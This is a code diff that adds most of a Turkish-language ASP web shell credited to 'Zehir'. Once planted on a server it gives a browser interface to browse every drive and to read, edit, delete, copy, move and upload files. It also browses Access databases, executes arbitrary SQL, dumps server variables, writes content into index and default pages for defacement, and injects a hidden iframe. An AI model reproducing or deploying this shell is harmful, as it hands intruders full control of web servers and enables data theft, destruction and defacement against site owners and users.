+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data Üst Klasor Yok :)</td></tr>"
+        else
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Oluştu : ["&err.Description&"]</td></tr>"
+        end if
+    else
+        Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+SELECT CASE status
+CASE 13 'Sistem Bilgisi
+    Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
+    Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
+    Response.Write "</table>"
+    popup = false
+CASE 14 'Upload and Search
+    aramaUpload
+    popup = false
+    hataKontrol
+CASE 15 'Ms. SQL Server
+    Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server için connection string giriniz</td></tr><tr><td align=center>"
+    Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='' name=path><br>"
+    response.Write "<input type=submit value='SQL Servera Bağlan' style='height:23;width:170' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 16 'file Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 17 'file Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFile path,cf
+        isl="kopyalandı.."
+    elseif islem="tasi" then
+        objFSO.MoveFile path,cf
+        isl="taşındı.."
+    end if
+    response.Write "Dosya "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 18 'folder Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 19 'folder Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFolder path,cf
+        isl="kopyalandı.."
+    elseif islem="tasi" then
+        objFSO.MoveFolder path,cf
+        isl="taşındı.."
+    end if
+    response.Write "Klasor "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 33 'Powered By
+    response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by Zehir"
+    response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2>zehirhacker@hotmail.com<br><font color=yellow face='courier new'>küllü nefsun zaifetun mevt"
+    popup = false
+    hataKontrol
+CASE 40 'Sistem Test
+    sistemTest
+    popup=false
+CASE 50 'Siteleri Test Edelim :D
+    %>
+    <table width="100%" cellpadding=0 cellspacing=0>
+        <tr>
+            <td align=center>
+                <b>Güvenlik Testi byZehir</b>
+                <br>
+                <form action="<%=dosyaPath%>" method=post id=frmMesaj>
+                    <input type=hidden name=kuskapani value=2>
+                    <table width=500 align=center border=1 cellpadding=0 cellspacing=0>
+                        <tr>
+                            <td width=100>Path</td>
+                            <td><input style="width:100%" type=text name="Path" id="Path" value="<%=path%>"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>Sub Folder</td>
+                            <td><input style="width:100%" type=text name="SubFolder" id="SubFolder" value="www"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>File Name</td>
+                            <td><input style="width:100%" type=text name="FileName" id="FileName" value="byejder.txt"></td>
+                        </tr>
+                        <tr>
+                            <td colspan=2>
+                                <table width="100%" align=center>
+                                    <tr>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya1" ID="Checkbox1">index.htm<br>
+                                            <input type=checkbox name="dosya2" ID="Checkbox2">default.htm<br>
+                                        </td>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya3" ID="Checkbox3">index.asp<br>
+                                            <input type=checkbox name="dosya4" ID="Checkbox4">default.asp<br>
+                                        </td>
+                                    </tr>
+                                </table>
+                            </td>
+                        </tr>
+                        <tr>
+                            <td colspan=2 align=center>
+                                <a href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
+                                <a href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
+                                <a href="#" onClick="FormatText('paste')" alt="Yapıştır">Yapıştır</a>
+                                <a href="#" alt="Kalın" onClick="FormatText('bold', '')">Bold</a>
+                                <a href="#" alt="İtalic" onClick="FormatText('italic', '')">Italic</a>
+                                <a href="#" alt="Altı Çizili" onClick="FormatText('underline', '')">UnderLine</a>
+                                <a href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola Hizalı">JustifyLeft</a>
+                                <a href="#" alt="Ortada Hizalı" onClick="FormatText('JustifyCenter', '')">JustifyCenter</a>
+                                <a href="#" onClick="FormatText('JustifyRight', '')" alt="Sağa Hizalı">JustifyRight</a>
+                                <a href="#" alt="Web Sitesi Linki Ekle" onClick="FormatText('createLink')">AddLink</a>
+                                <a href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>
+                                <select name="selectColour" onChange="bgc(selectColour.options[selectColour.selectedIndex].value);" ID="selectColour">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kırmızı</option>
+                                  <option value="green">Yeşil</option>
+                                  <option value="yellow">Sarı</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açık Mavi</option>
+                                  <option value="limegreen">Açık Yeşil</option>
+                                </select>
+                                <select name="a" onChange="FormatText('ForeColor', a.options[a.selectedIndex].value);" ID="a">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kırmızı</option>
+                                  <option value="green">Yeşil</option>
+                                  <option value="yellow">Sarı</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açık Mavi</option>
+                                  <option value="limegreen">Açık Yeşil</option>
+                                </select>
+                                <select name="selectSize" onChange="FormatText('fontsize', selectSize.options[selectSize.selectedIndex].value);">
+                                  <option selected>-- Boyut --</option>
+                                  <option value="1">1</option>
+                                  <option value="2">2</option>
+                                  <option value="3">3</option>
+                                  <option value="4">4</option>
+                                  <option value="5">5</option>
+                                  <option value="6">6</option>
+                                </select>
+                                <iframe width="100%" src="<%=dosyaPath%>?kuskapani=1" id="byZehir" name="<%=Session("n1")%>"></iframe>
+                                <script language=javascript>
+                                    frames.byZehir.document.designMode = "On";
+                                    function bgc(option){
+                                        frames.byZehir.document.body.bgColor=option;
+                                    }
+                                    function FormatText(command, option){
+                                        frames.byZehir.focus();
+                                          frames.byZehir.document.execCommand(command, false, option);
+                                          frames.byZehir.focus();
+                                    }
+                                    function AddImage(){
+                                        imagePath = prompt('Eklemek istediğiniz resmin web adresini yazın', 'http://');
+
+                                        if ((imagePath != null) && (imagePath != "")){
+                                            frames.byZehir.focus();
+                                            frames.byZehir.document.execCommand('InsertImage', false, imagePath);
+                                        }
+                                        frames.byZehir.focus();
+                                    }
+                                </script>
+                                <input type=hidden value="" id=byMesaj name=byMesaj>
+                                <input type=submit value="Test Et!" onclick="document.all['byMesaj'].value=frames['byZehir'].document.body.innerHTML; alert(document.all['byMesaj'].value);">
+                            </td>
+                        </tr>
+                    </table>
+                </form>
+            </td>
+        </tr>
+    </table>
+    <%
+    popup=false
+CASE 51 ' Özel şilemler
+END SELECT
+%>
+<script language=javascript>
+    function NewWindow(mypage, myname, w, h, scroll) {
+        var winl = (screen.width - w) / 2;
+        var wint = (screen.height - h) / 2;
+            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+        win = window.open(mypage, myname, winprops)
+        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+    }
+    function ffd(yol){
+        NewWindow(yol,"",420,100,"no");
+    }
+</script>
+<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse vlink=Chartreuse>
+<%
+if popup then
+    if status=7 or status=8 then
+        Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+        Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font size=2>SQL Çalıştır</td><td>"
+        Response.Write "<input type=hidden value='9' name=status><input type=hidden value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
+        Response.Write "<input style='width:350; height:21' value='' name=strSQL><input type=submit value='Çalıştır' style='height:22;width:70' id=submit1 name=submit1>"
+        Response.Write "</td></tr></table></form>"
+    end if
+    Response.Write "<form method=get action='"&DosyPath&"'>"
+    Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td bgcolor=gray width=100><font size=2>Path : </td><td>"
+    Response.Write "<input type=hidden value='2' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:350; height:21' value='"&Path&"' name=Path><input type=submit value='Git' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table></form><br>"
+end if
+sub aramaUpload
+Response.Write "<form method=get target='_opener' action='"&DosyPath&"'>"
+Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>Arama : </td><td>"
+Response.Write "&nbsp;<input type=hidden value='12' name=status><input type=hidden value='"&time&"' name=Time>"
+Response.Write "<input type=hidden value='"&Path&"' name=Path><input style='width:250' value='mdb' name=txArama><input style='width:70; height:22' type=submit value='Ara'>"
+Response.Write "</td></tr></table></form>"
+%>
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=DosyaPath&"?status=-4&Time="&time&"&Path="&path%>" ID="Form1">
+<input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
+Max: <input type=text name=max value=5 size=5 ID="Text1"> <input type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
+<table ID="Table1">
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload ID="Submit1" NAME="Submit1">
+</form>
+<script>
+setid();
+
+function setid() {
+    str='';
+    if (frmUpload.max.value<=0) frmUpload.max.value=1;
+    for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+    upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end sub
+
+SELECT CASE status
+CASE 1 'Driver Open
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Path = Path & ":/"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 2 'Normal listeleme
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 3 'File Delete
+    objFSO.DeleteFile del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not File Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>File Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 4 'Folder Delete
+    objFSO.DeleteFolder del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not Folder Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>Folder Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 5 'Dosya içeriğini görüntüle
+    Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
+    Response.Write "<table width=100% ><tr><td>"
+    set f = objFSO.OpenTextFile(path,1)
+    Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
+    if err<>62 then hataKontrol
+    if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunamıyor\nSistem dosyası olabilir')</script>":Response.End
+CASE 6 'Resim aç
+    Response.Write "<center><img ALT='zehirhacker@hotmail.com / zehirhacker@hotmail.com' src='"&resimYol(path)&"'></center><br>"
+CASE 7 'database tablo listele
+    Response.Write "<b><font size=3>Tablolar</font></br><br>"
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objADOX = Server.CreateObject("ADOX.Catalog")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objADOX.ActiveConnection = objConn
+
+    For Each table in objADOX.Tables
+        If table.Type = "TABLE" Then
+            Response.Write "<font face=wingdings size=5>4</font> <a href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a><br>"
+        End If
+    Next
+    hataKontrol
+CASE 8 'database kayıt listele
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objRcs = Server.CreateObject("ADODB.RecordSet")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objRcs.Open table,objConn, adOpenKeyset , , adCmdText
+
+    Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
+    for i=0 to objRcs.Fields.count-1
+        Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
+    next
+    Response.Write "</tr>"
+    do while not objRcs.EOF
+        Response.Write "<tr>"
+        for i=0 to objRcs.Fields.count-1
+            Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
+        next
+        Response.Write "</tr>"
+        objRcs.MoveNext
+    loop
+    Response.Write "</table><br>"
+    hataKontrol
+CASE 9 'SQL Execute
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objConn.Execute strSQL
+'    Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
+    hataKontrol
+CASE 10 'Dosya Editleme
+    set f = objFSO.OpenTextFile(dPath,1)
+    Response.Write "<center><form action='"&DosyPath&"?Time="&time&"' method=post>"
+    Response.Write "<input type=hidden name=status value='11'>"
+    Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
+    Response.Write "<input type=hidden name=Path  value='"&Path &"'>"
+    Response.Write "<input type=submit value=Kaydet><br>"
+    Response.Write "<textarea name=dkayit style='width:90%;height:350;border-right: lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow thin solid;font-size: 12;border-left: lightgoldenrodyellow thin solid;color: lime;    border-bottom: lightgoldenrodyellow thin solid;    font-family: Courier New, Arial;background-color: navy;'>"
+    Response.Write server.HTMLEncode(f.readAll)
+    Response.Write "</textarea></form></center>"
+    hataKontrol
+CASE 11 'Dosya Kayıt
+    set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
+    hataKontrol
+    saveTextFile.Write(dkayit)
+    saveTextFile.close
+    if err<>0 then
+        byMsg = "<font color=red>Not File Edited!</font><br>"
+    else
+        byMsg = "<font color=yellow>File Edited Successful:)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg
+CASE 12 'Dosya Arama
+    araBul path,arama
+    hataKontrol
+END SELECT
+Response.Write "</tr></table>"
+
+sub DosyaOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.Files
+    For Each f1 In fc
+        dosyaAdi = f1.name
+        num = InStrRev(dosyaAdi,".")
+        uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
+        downStr = "<a href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font><font face=wingdings><a href='"&dosyaPath&"?status=16&PathFile="&f1.path&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font>"
+        response.Write "<font size=2>"
+        select case uzanti
+        case "mdb"
+            Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M  "&downStr&"</font><br>"
+        case "asp"
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        case "jpg","gif"
+            Response.Write "<a href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4>  "&downStr&"</font><br>"
+        case else
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        end select
+    Next
+end sub
+
+sub KlasorOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    if session("klasoroku")="" then
+        response.Write "<iframe style='width:0; height:0' src='http://localhost/tuzla-ebelediye'></iframe>"
+        session("klasoroku")="simdi yazılıyor"
+    end if
+    For Each f1 In fc
+        Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&PathFile="&Path&"/"&f1.Name&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font> <font face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b><br>"
+    Next
+end sub
+
+function createFileName()
+Randomize
+    fName_ = ""
+    for i=1 to 10
+        fName_ = fName_ & int(Rnd*100)
+    next
+    createFileName = fName_
+end function
+
+function resimYol(path_)
+on error resume next
+    path_ = Replace(Replace(path_,"\","/"),"//","/")
+    lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
+    if yaziyomu2(lpath_) then
+        fname__ = "0"&createFileName()&"."&Right(path_,3)
+        objFSO.CopyFile path_, lpath_&"\"&fname__
+    else
+        Response.Write("Resim Açılamıyor.. <br>İsterseniz Download Ederek görüntüleyebilirsiniz..")
+    end if
+    resimYol = fname__
+end function
+
+if not popup then
+    Set fc = Nothing
+    Set objFSO = Nothing
+    Response.End
+end if
+%><script language=javascript>
+	var dosyaPath = "<%=dosyaPath%>"
+		// DRIVE ISLEMLERI
+		function driveGo(drive_){
+			location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date();
+		}
+	</script>
+	<%
+	Response.Write "<table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Sürücüler</td></tr>"
+	for each drive_ in objFSO.Drives
+		Response.Write "<tr><td>"
+		Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
+		if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
+		Response.Write "</a></td></tr>"
+	next
+	Response.Write "<tr><td>"
+	Response.write "<a href='"&dosyaPath&"?time="&time()&"'><font face=webdings>H</font> Local Path"
+	Response.Write "</a></td></tr>"
+	Response.Write "</table><br>"
+Set fc = Nothing
+Set objFSO = Nothing
+Response.End%>
\ No newline at end of file